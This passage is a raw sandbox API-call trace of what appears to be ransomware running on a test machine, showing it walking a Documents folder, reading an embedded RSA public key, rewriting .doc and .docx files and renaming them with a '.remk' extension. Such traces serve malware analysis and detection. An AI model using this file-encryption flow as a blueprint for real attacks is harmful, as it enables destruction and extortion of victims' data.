hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.680] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0231.680] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0231.680] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0231.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.680] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0231.680] PathFindFileNameW (pszPath="") returned="" [0231.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0231.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.680] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0231.680] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc79e1070, ftCreationTime.dwHighDateTime=0x1d57cd9, ftLastAccessTime.dwLowDateTime=0xca77ba80, ftLastAccessTime.dwHighDateTime=0x1d58954, ftLastWriteTime.dwLowDateTime=0xca77ba80, ftLastWriteTime.dwHighDateTime=0x1d58954, nFileSizeHigh=0x0, nFileSizeLow=0xb2fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-t95GiOnGNPstm-E.docx", cAlternateFileName="-T95GI~1.DOC")) returned 1 [0231.680] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-t95GiOnGNPstm-E.docx") returned=".docx" [0231.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-t95GiOnGNPstm-E.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-t95giongnpstm-e.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.682] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=45821) returned 1 [0231.682] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.685] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb2d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.685] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.687] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xb2fd, lpOverlapped=0x0) returned 1 [0231.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.688] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.689] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.689] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.689] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.689] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.689] GetLastError () returned 0x0 [0231.689] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.690] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.690] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.690] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.690] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.690] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.691] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb2fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.691] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.691] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.691] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.691] CloseHandle (hObject=0x640) returned 1 [0231.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.699] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-t95GiOnGNPstm-E.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-t95giongnpstm-e.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-t95GiOnGNPstm-E.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-t95giongnpstm-e.docx.remk")) returned 1 [0231.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.700] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0231.701] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb968c1c0, ftCreationTime.dwHighDateTime=0x1d5ddbf, ftLastAccessTime.dwLowDateTime=0xd32ab800, ftLastAccessTime.dwHighDateTime=0x1d5ddbc, ftLastWriteTime.dwLowDateTime=0xd32ab800, ftLastWriteTime.dwHighDateTime=0x1d5ddbc, nFileSizeHigh=0x0, nFileSizeLow=0x111a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2Tp_ LqkBdu-05P.doc", cAlternateFileName="2TP_LQ~1.DOC")) returned 1 [0231.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.701] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2Tp_ LqkBdu-05P.doc") returned=".doc" [0231.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2Tp_ LqkBdu-05P.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tp_ lqkbdu-05p.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.702] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=70053) returned 1 [0231.703] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.705] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1117f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.705] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.707] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.707] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x111a5, lpOverlapped=0x0) returned 1 [0231.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.708] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.709] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.709] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.709] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.709] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.709] GetLastError () returned 0x0 [0231.710] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.710] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.710] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.710] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.710] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x111b0) returned 0x37c2278 [0231.710] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1878 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf38 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c18c0 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf50 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf80 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edfe0 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf98 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.711] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf80 | out: hHeap=0x630000) returned 1 [0231.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf98 | out: hHeap=0x630000) returned 1 [0231.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfe0 | out: hHeap=0x630000) returned 1 [0231.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edfe0 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edf98 [0231.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edf80 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf98 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf80 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edfe0 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.712] GetCurrentThreadId () returned 0x314 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697f48 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.713] GetCurrentThreadId () returned 0x314 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.713] RtlAllocateHeap 